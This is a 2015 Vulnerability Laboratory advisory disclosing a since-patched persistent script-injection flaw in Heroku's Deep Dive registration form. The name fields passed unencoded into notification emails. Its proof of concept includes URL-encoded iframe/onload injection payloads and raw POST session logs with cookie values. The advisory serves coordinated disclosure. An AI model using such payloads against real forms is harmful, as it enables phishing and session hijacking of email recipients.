Document Title:
===============
Heroku API Deep Dive Bug Bounty #3 - Persistent UI Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1398

BugCrowd ID: 6b37910a3c5685b944a3ad65068aa251af47450953a06b8b13d74b35d708f6b0

Acknowledgement (Hall of Fame): https://bugcrowd.com/heroku/hall-of-fame


Release Date:
=============
2015-01-12


Vulnerability Laboratory ID (VL-ID):
====================================
1398


Common Vulnerability Scoring System:
====================================
2.5


Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. 
Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers 
without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and 
designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. 
Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.

Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service 
lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. 

(Copy of the Vendor Homepage: https://www.heroku.com/home )

We`ve been busy this fall at events meeting and talking to a lot of developers like you. We`ve great discussions and 
wanted to share the knowledge with the Heroku community. In this demo, we`re going to address some of the the most 
frequently asked questions. And we want to hear from you so we`ll leave the last 10 minutes for open Q&A.  If you 
think we should add something to the list, please let us know!

(COpy of the Vendor Homepage: http://lp2.heroku.com/Heroku_Deep_Dive_d )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Heroku API - Deep Dive web-application online service. 


Vulnerability Disclosure Timeline:
==================================
2014-11-14:     Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-11-15:     Vendor Notification (Heroku Security - Bug Bounty Program)
2014-12-06:     Vendor Response/Feedback  (Heroku Security - Bug Bounty Program)
2015-01-08:     Vendor Fix/Patch  (Heroku Developer Team - Reward: Bug Bounty)
2015-01-12:     Public Disclosure  (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Heroku
Product: Deep Dive (API) Web-Application 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Heroku API - Deep Dive web-application online service. 
The application-side issue allows remote attackers to compromise emails by injection of own malicious persistent context.

The heroku deep dive website impact a input field restriction mistake that affects the connected notify service. Remote attackers can 
use the deep dive registration form to inject own malicious payloads that gets send through the connected service of the heroku website. 
The restriction misconfiguration of the input field affects the open citrixonline.com gotomeeting notify mail. The service allows to send 
by configuration but the input that performs the request needs to be encoded. After for example the input fields and POST request of the 
site is restricted the payload execution not occur through the mailing service.

The security risk of the persistent mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) 
count of 2.5. Exploitation of the persistent vulnerability requires no privileged heroku account but low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external source 
and persistent manipulation of affected or connected module context.

Request Method(s):
        [+] POST

Vulnerable Module(s):
        [+] Invitation (heroku.com/Heroku_Deep_Dive_d)

Vulnerable Input(s):
        [+] Firstname
        [+] Lastname

Vulnerable Parameter(s):
        [+] firstname & lastname

Affected Module(s):
        [+] Heroku - Deep Dive


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and 
with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information or 
steps below to continue.

Manual steps to reproduce the vulnerability ...

1. Open the website of the new heroku deep dive info service registration site
2. Include a script code payload to the firstname and lastname input fields and send it to the target mailbox
3. The execution of the persistent injected script code occurs in the mail context that arrives through the weak input restriction of the heroku service (api)


PoC: Exploit

<td><font style="font-size: 14px; font-weight: bold" color="#000000" face="arial,verdana,helvetica">Join us on
Thursday, Nov 13, 2014 10:00 AM - 10:30 AM PST</font></td>
</tr>
<tr>
<td height="20"></td>
</tr>
<tr>
<td>
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><font style="font-size: 12px;" color="#000000" face="arial,verdana,helvetica">Dear "><[PERSISTENT INJECTED SCRIPT CODE VIA POST!]>,</font></td>
</tr>


--- PoC Session Logs [POST] ---
0:36:59.324[550ms][total 550ms] Status: 200[OK]
POST http://lp2.heroku.com/form/checkEmailAjax/account_id/36622/form_field_id/164298/tracker_id/42161190/field_id/36622_164298pi_36622_164298?param=admin%2540evolution-sec.com 
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[161] Mime Type[text/html]
   Request Header:
      Host[lp2.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X_REQUESTED_WITH[XMLHttpRequest]
      Referer[http://lp2.heroku.com/Heroku_Deep_Dive_d]
      Content-Length[33]
      Content-Type[text/plain; charset=UTF-8]
      Cookie[pardot=gplsdc4i9roje436vho74bvag7; visitor_id36622=279785406]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      param[admin%2540evolution-sec.com]
   Response Header:
      Date[Wed, 12 Nov 2014 23:37:06 GMT]
      Server[Apache]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      X-Pardot-Rsp[28/206/241]
      p3p[CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"]
      Vary[Accept-Encoding,User-Agent]
      Content-Encoding[gzip]
      Content-Length[161]
      Content-Type[text/html; charset=utf-8]
      X-Pardot-LB[lb-s3]
      X-Pardot-Route[public]
      Connection[close]
--
0:37:19.698[986ms][total 986ms] Status: 302[Found]
POST http://lp2.heroku.com/Heroku_Deep_Dive_d 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[113] Mime Type[text/html]
   Request Header:
      Host[lp2.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://lp2.heroku.com/Heroku_Deep_Dive_d]
      Cookie[pardot=gplsdc4i9roje436vho74bvag7; visitor_id36622=279785406]
      Connection[keep-alive]
   POST-Daten:
      36622_164294pi_36622_164294[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL]
      36622_164296pi_36622_164296[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL%22%29+%3C]
      36622_164302pi_36622_164302[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL%22%29+%3C]
      36622_164298pi_36622_164298[admin%40evolution-sec.com]
      36622_164304pi_36622_164304[015776363337]
      36622_164300pi_36622_164300[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29+%3C]
      pi_extra_field[]
      _utf8[%E2%98%83]
      hiddenDependentFields[]
   Response Header:
      Date[Wed, 12 Nov 2014 23:37:26 GMT]
      Server[Apache]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Location[http://lp2.heroku.com/deep_dive_TY]
      p3p[CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"]
      Vary[Accept-Encoding,User-Agent]
      Content-Encoding[gzip]
      Content-Length[113]
      Content-Type[text/html; charset=UTF-8]
      Set-Cookie[flash_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_success_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; 
path=/; secure
flash_error=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_created_object_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_access_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_warning=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure]
      X-Pardot-LB[lb-s3]
      X-Pardot-Route[public]
      Connection[close]


Reference(s):
http://lp2.heroku.com/Heroku_Deep_Dive_d
http://lp2.heroku.com/form/checkEmailAjax/
http://lp2.heroku.com/deep_dive_TY


Solution - Fix & Patch:
=======================
The vulnerability is not located at the citrix online service of gomeeting even if it looks like. The service of the heroku site does not encode/validate or restrict the input thats gets 
send to the citrix online service for a mail notify. The vulnerable module is the deep dive invitation form that is not secure implemented. (http://lp2.heroku.com/deep_dive_TY)


Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the heroku deep dive service is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

        Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt